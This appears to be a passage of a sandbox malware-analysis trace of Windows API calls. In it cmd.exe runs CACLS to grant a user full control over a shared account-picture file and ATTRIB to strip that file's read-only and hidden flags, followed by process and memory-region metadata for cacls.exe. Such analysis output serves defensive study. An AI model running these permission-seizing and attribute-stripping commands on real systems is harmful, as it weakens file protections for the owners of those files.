[0186.010] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.010] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.010] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.010] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.010] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f940 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.010] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f940, lpFilePart=0x20f93c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f93c*="Desktop") returned 0x18 [0186.010] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.010] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f6bc | out: lpFindFileData=0x20f6bc) returned 0x290ae8 [0186.010] FindClose (in: hFindFile=0x290ae8 | out: hFindFile=0x290ae8) returned 1 [0186.010] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f6bc | out: lpFindFileData=0x20f6bc) returned 0x290ae8 [0186.010] FindClose (in: hFindFile=0x290ae8 | out: hFindFile=0x290ae8) returned 1 [0186.010] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f6bc | out: lpFindFileData=0x20f6bc) returned 0x290ae8 [0186.011] FindClose (in: hFindFile=0x290ae8 | out: hFindFile=0x290ae8) returned 1 [0186.011] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.011] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.011] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.011] GetEnvironmentStringsW () returned 0x290308* [0186.011] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.011] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.011] GetConsoleOutputCP () returned 0x1b5 [0186.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.011] GetUserDefaultLCID () returned 0x409 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fa80, cchData=128 | out: lpLCData="0") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fa80, cchData=128 | out: lpLCData="0") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fa80, cchData=128 | out: lpLCData="1") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.012] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0186.012] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.013] GetConsoleTitleW (in: lpConsoleTitle=0x2809b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.013] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.013] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.013] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.014] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.014] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.014] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.014] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.015] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.015] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.015] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.015] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.017] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.017] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.017] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.017] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.017] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.017] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.017] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.019] GetConsoleTitleW (in: lpConsoleTitle=0x20f714, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.020] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.020] _wcsicmp (_String1="CACLS", 
_String2="DEL") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.020] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.020] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.020] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.020] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.020] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.020] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.020] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.020] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.020] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.020] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.020] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.020] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.020] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.020] _wcsicmp (_String1="CACLS", 
_String2="START") returned -16 [0186.020] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.020] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.020] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.020] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.020] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.020] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.020] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.020] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.020] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.021] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.021] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.021] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.021] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.021] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.021] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.021] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.021] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0186.021] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.021] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.021] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.021] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.021] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.021] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.021] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.021] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.021] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.021] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.021] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.021] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.021] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.021] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.021] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.021] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.021] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.021] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.021] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.021] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.022] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.022] SetErrorMode (uMode=0x0) returned 0x0 [0186.022] SetErrorMode (uMode=0x1) 
returned 0x0 [0186.022] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x291e98, lpFilePart=0x20f234 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f234*="Desktop") returned 0x18 [0186.022] SetErrorMode (uMode=0x0) returned 0x1 [0186.022] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.022] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.027] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.028] GetLastError () returned 0x2 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.028] GetLastError () returned 0x2 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x292180 [0186.028] FindClose (in: hFindFile=0x292180 | out: hFindFile=0x292180) returned 1 [0186.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.028] GetLastError () returned 0x2 [0186.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x20efb0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x292180 [0186.029] FindClose (in: hFindFile=0x292180 | out: hFindFile=0x292180) returned 1 [0186.029] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.029] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.029] GetConsoleTitleW (in: lpConsoleTitle=0x20f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.029] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f330, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f3f8 | out: lpAttributeList=0x20f330, lpSize=0x20f3f8) returned 1 [0186.029] UpdateProcThreadAttribute (in: lpAttributeList=0x20f330, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f3f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f330, lpPreviousValue=0x0) returned 1 [0186.029] GetStartupInfoW (in: lpStartupInfo=0x20f2ec | out: lpStartupInfo=0x20f2ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.029] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.030] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f38c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, 
dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f3d8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f3d8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xee8, dwThreadId=0xf04)) returned 1 [0186.032] CloseHandle (hObject=0x4c) returned 1 [0186.032] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.032] GetEnvironmentStringsW () returned 0x290308* [0186.032] FreeEnvironmentStringsW (penv=0x290308) returned 1 [0186.033] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.063] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f2cc | out: lpExitCode=0x20f2cc*=0x0) returned 1 [0186.063] CloseHandle (hObject=0x50) returned 1 [0186.063] _vsnwprintf (in: _Buffer=0x20f414, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f2d8 | out: _Buffer="00000000") returned 8 [0186.063] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.063] GetEnvironmentStringsW () returned 0x292410* [0186.063] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.063] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.063] GetEnvironmentStringsW () returned 0x292410* [0186.063] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.063] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f330 | out: lpAttributeList=0x20f330) [0186.063] GetConsoleTitleW (in: lpConsoleTitle=0x20f714, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.064] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.064] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.064] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.064] GetLastError () returned 0x2 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.064] GetLastError () returned 0x2 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x28e4d8 [0186.064] FindClose (in: hFindFile=0x28e4d8 | out: hFindFile=0x28e4d8) returned 1 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.065] GetLastError () returned 0x2 [0186.065] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x28e4d8 [0186.065] FindClose (in: hFindFile=0x28e4d8 | out: hFindFile=0x28e4d8) returned 1 [0186.065] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.065] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.065] GetConsoleTitleW (in: lpConsoleTitle=0x20f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.065] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x20f330, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f3f8 | out: lpAttributeList=0x20f330, lpSize=0x20f3f8) returned 1 [0186.065] UpdateProcThreadAttribute (in: lpAttributeList=0x20f330, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f3f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f330, lpPreviousValue=0x0) returned 1 [0186.065] GetStartupInfoW (in: lpStartupInfo=0x20f2ec | out: lpStartupInfo=0x20f2ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.065] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.065] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f38c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f3d8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessInformation=0x20f3d8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xed4, dwThreadId=0x3c4)) returned 1 [0186.067] CloseHandle (hObject=0x50) 
returned 1 [0186.067] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.067] GetEnvironmentStringsW () returned 0x292410* [0186.067] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.067] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.099] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f2cc | out: lpExitCode=0x20f2cc*=0x0) returned 1 [0186.099] CloseHandle (hObject=0x4c) returned 1 [0186.099] _vsnwprintf (in: _Buffer=0x20f414, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f2d8 | out: _Buffer="00000000") returned 8 [0186.099] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.099] GetEnvironmentStringsW () returned 0x292410* [0186.099] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.099] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.100] GetEnvironmentStringsW () returned 0x292410* [0186.100] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.100] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f330 | out: lpAttributeList=0x20f330) [0186.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.100] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.100] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.100] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.100] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.100] SetConsoleInputExeNameW () returned 0x1 [0186.100] GetConsoleOutputCP () returned 0x1b5 [0186.100] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.100] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.100] exit (_Code=0) Process: id = "380" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xee8" os_integrity_level = "0x3000" 
os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "379" os_parent_pid = "0xdac" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26657 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26658 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26659 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26660 start_va = 0x130000 end_va = 0x138fff entry_point = 0x130000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26661 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26662 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26663 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26664 
